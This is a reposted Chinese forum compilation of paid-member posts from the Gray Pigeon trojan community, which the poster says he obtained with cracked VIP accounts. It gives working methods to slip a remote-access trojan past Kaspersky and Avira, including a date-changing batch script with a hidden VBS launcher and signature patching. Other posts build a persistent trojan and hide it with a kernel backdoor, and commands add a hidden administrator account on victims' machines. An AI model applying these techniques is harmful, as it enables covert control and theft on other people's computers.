(轉貼)木馬灰鴿子文章分享，告戒大家不要迷信“殺軟”

裏面有僅次於灰鴿子作者葛軍的二號人物鳳凰木馬鴿子主代理論壇weiwen的原創帖子，不乏對付或摧毀小紅傘antivir以及卡巴斯基的方法，全部收費內容供網友免費學習！！！

帖子內容介紹：“灰鴿子病毒”由於所謂的“新聞聯播”的報道，現已轉入地下，已經不再收VIP會員（原來成為VIP要100元/年），本人 破解了幾個VIP的ID，上灰鴿子論壇將VIP或者有“威望”才能看的精華貼整理了一下，供大家學習電腦安全高級知識，有一些木馬“免殺”（免於殺軟查 殺）的技術，屬“賊”對付所謂“警察”的技術，給特別是迷信所謂“殺軟”（所謂的“殺毒軟體”）、“防火牆”的朋友一個警戒，屬本人原創帖，我將多個鴿子 VIP論壇的精華貼整理到一起發

100%過卡巴6.0行為的方法
本帖被 weiwen 執行加亮操作(2007-04-04)
在我們新的修改版沒有公佈出來之前，鳳凰會員暫時可用這種方法卡巴6.0的行為攔截。

1.過卡巴6.0的啟動攔截的方法：如：在安裝名稱$(WinDir)\G_Server2006.exe改為$(WinDir)\G_Server2006去除尾碼的方法。
2.過兩個插入進程的提示方法:只要在高級選擇中的1和3不打勾即可。
3.可以重新修改插入進程，這樣就100%過卡巴的6.0行為了。
注：通常新用戶修改第一步已經OK的了，因為卡巴的默認安裝後是不打開進程插入監控的.

經過幾天的努力..終於做出了第一次過小紅傘的VIP1.23無殼鴿子
大家可以測試一下.. 可以導入配置資訊(原配置資訊已經刪掉.運行了也沒關係).
只做了小紅傘的免殺..其他都沒做..主要是發出來跟大家分享一下...
只能發連接...
剛改了下載連接..現在可以直接下載了!!!

修改方法簡單可以這樣說

加花打底/定位特徵碼/查出特徵碼為輸入表的DLL的文件名(DLL文件名無法修改和移動)/ 再移動輸入表資訊(特徵碼會自動轉移,很BT,紅傘似乎會跟著你的變化而變化)/再找一個紅傘查殺行走路線的點給NOP掉(本人找不到原理,純粹靠試 驗...原理還需要近一步研究)(因為改特徵點已經無用.只能在它的"行走"路線上設卡..)
以上說法可能存在不對之處,請高人指明..

過卡吧主動防禦思路
思路就是修改系統時間,達到卡巴實效,然後鴿子運行,然後再把系統時間改回來,首先要準備好你的免殺鴿子
先打開記事本,把以下代碼保存為time.bat,(文字全為說明,不用複製)
@echo
set date=%date% 令參數%data%等於現在的日期，一會兒恢復時間用
date 1987-12-18 修改系統時間使卡巴監控失效
ping -n 10 127.0.0.1 等待10秒,10秒後卡巴已經挂了,
start notepad 運行程式(可以換成鴿子)
ping -n 5 127.0.0.1 等待5秒,
date %date% 改回來時間,卡巴又復活了

但是運行的那個DOS窗口實在看著不爽
我們在建個腳本,打開記事本,把以下代碼保存為a.vbs
Set shell = Wscript.createobject("wscript.shell")
a = shell.run ("time.bat",0)
現在已經隱藏運行了,有條件的可以改造,甚至可以根據這個思路寫個小程式
本帖最近評分記錄：
鳳凰幣:10 (By weiwen) | 2007-02-01 11


要過葛軍自家專殺很簡單，配置的時候無註冊，無服務，無尾碼，配置出來後改進程，自定義啟動方式，反正別用鴿子自帶的啟動方式就OK了，具體做法就是把配置好的無註冊和服務的EXE做成資源，用DELPHI或VB以捆綁方式重新編譯下，加入自定義開機啟動方式，保證什麼自己專殺也傻瓜。

配製的時只選註冊表啟動一項就可以過專殺

過鴿子自家專殺以及不死神鴿子的製作方法.
首先申明下,此方法需要編程基礎,並非人人能掌握.
一:過葛軍專殺,首先配置鴿子服務端,記住無註冊,無服務,無尾碼,不要隱藏進程,注射IE.配置結束後修改注射進程,注射到一些無法結束的系統進程就 行,不過雖然系統進程,但是還是能結束的,為什麼?因為注射並非DLL載入,還是有相同的獨立進程,經驗豐富的老鳥隨便就結束掉了,但是糊下菜鳥沒什麼問 題,上面改完的話已經過掉了IE防漏和一般的專殺,但是運行有問題,因為無啟動項.下面把改好進程,測試沒問題的服務端再進行免殺,免殺的方法就不詳細說 了,相關教程很多,免殺完畢開始過葛軍專殺,把配置好的鴿子服務端當作資源,用DELPHI或VB用資源捆綁方式,並加入自定義開機啟動方式,如何開機啟 動方式還是用註冊表吧,寫的好的話直接連卡巴主防的註冊表監控都過,甚至可以領先於系統啟動.到這裡,葛軍專殺就已經過了,不信的話自己測試去.
二:殺軟殺不盡,關機開又來的不死神鴿.首先還是配置,無註冊,無服務,注射IE,不隱藏進程,重要的一點,運行後不要刪除本身.然後還是修改進程,免殺 等等,這裡的鴿子服務端免殺要保證文件都過,內存什麼的沒什麼關係,改完後就開始再次用DELPHI或VB資源捆綁了,這次有點麻煩,要設置好這個不刪除 本身服務端的複製路徑,同時資源捆綁的文件要本身刪除,不留痕跡,還要加入自定義開機啟動指向那個運行後不刪除自身的服務端,這樣就實現了不死神鴿,運行 原理是這樣的,開機啟動服務端,並且複製到指定路徑啟動,這樣就過了自家專殺,行為,防漏,主動,等等,哪怕被內存查殺,甚至對應文件查殺,只要保證你的 不刪除服務端不被查殺,則殺軟殺不盡,開機又回來.


駭客守衛者+鴿子免殺=無敵神鴿
[post] 我們都知道鳳凰VIP的免殺鴿子很好用,這是公認的,這個鴿子中到家用PC上還可以但要是放到伺服器上就有點讓人擔心了.
1.管理員查下進程就OK了,
2.看下可以服務,因為鴿子他會加為服務,
3.netstat -an這個我就不用說了吧 大家都知道.
好了,現在我就為大家做個無敵神鴿,其實用一個軟體就可以了,
駭客守衛者,一個內核級後門軟體,先看下他的說明大家就都明白了,
駭客守護者是一款異常強大的驅動級後門!可以隱藏你的木馬和後門的端口,服務,進程
這裡寫入你要隱藏的文件和文件夾名稱
第一個是隱藏駭客守衛者自己的,建議不要刪除
好,比如我們給肉雞裝了個Radmin吧,那我們就在隱藏文件裏把它的服務端文件rserver.exe加到這裡
注意一行一個哦~
你也可以用通配符*
這樣到話只要是以rserv開頭到文件夾和文件名都會隱藏
------------------------
隱藏進程和隱藏文件一樣
我們把rserver.exe也加到這裡
當然,它同樣支援通配符*
下面是隱藏服務
Radmin的服務名是r_server
所以我們把它加到下面
------------------------
隱藏端口
4899是RADMIN到默認端口,TCP協議的,那麼我們在TCP端口裏面添上4899
可能你還開了肉雞的3389,那我們把3389也加到裏面,用[,]隔開
UDP端口和TCP端口一樣
------------------------
隱藏註冊表
已經有的是駭客守衛者自己的註冊表項
你可以在這裡把你的木馬的註冊表項隱藏
RADMIN的註冊表項是RAdmin
所以我們加到裏面就可以了
------------------------
跟隨啟動
就是讓某個程式跟隨駭客守衛者啟動
它支援系統變數和運行參數
比如要肉雞開機後添加一個用戶
我們可以這樣添
%windir%\system32\cmd.exe /c net user coofly 123456 /add
你要提權這個用戶的話再加一個
%windir%\system32\cmd.exe /c net localgroup administrators coofly /add
這樣就好了``
------------------------
後門設置
駭客守衛者啟動後,你可以從任意一個端口用駭客守衛者提供的客戶端進行連接,得到一個管理員許可權的CMD SHELL
連接口令就是你登錄SHELL的口令了
駭客守衛者是以驅動和服務兩種方法啟動的
服務名稱就是駭客守衛者的啟動服務名稱了
顯示名稱和描述大家應該都明白,如果改了服務名稱,那麼在隱藏服務裏應該把改後的服務名稱也加進去
比如我改成
hackdoor
那麼我們應該在隱藏服務裏它把也加進去
驅動名稱和驅動文件名稱可以隨便改
不過要注意的是驅動文件名稱必須是.SYS結尾的
------------------------
生成配置
現在已經配置好了,我們可以生成配置文件了
點生成配置,然後選擇保存位置
添上文件名,點保存就可以OK咯!!~
現在大家應該明白怎麼可以做出無敵的鴿子了吧!
因為駭客守衛者生成出來的是兩個文件你要想和鴿子捆綁到一塊可以用個鳳凰的捆綁軟體就可以了..[/post]

對世面上出現幾款遠控調查
上興 18 票
牧民灰鴿子 8 票
網路紅娘 3 票
守望者 4 票
熊寶寶遠控 6 票
黑洞 13 票
黑贏 2 票
其他…… 9 票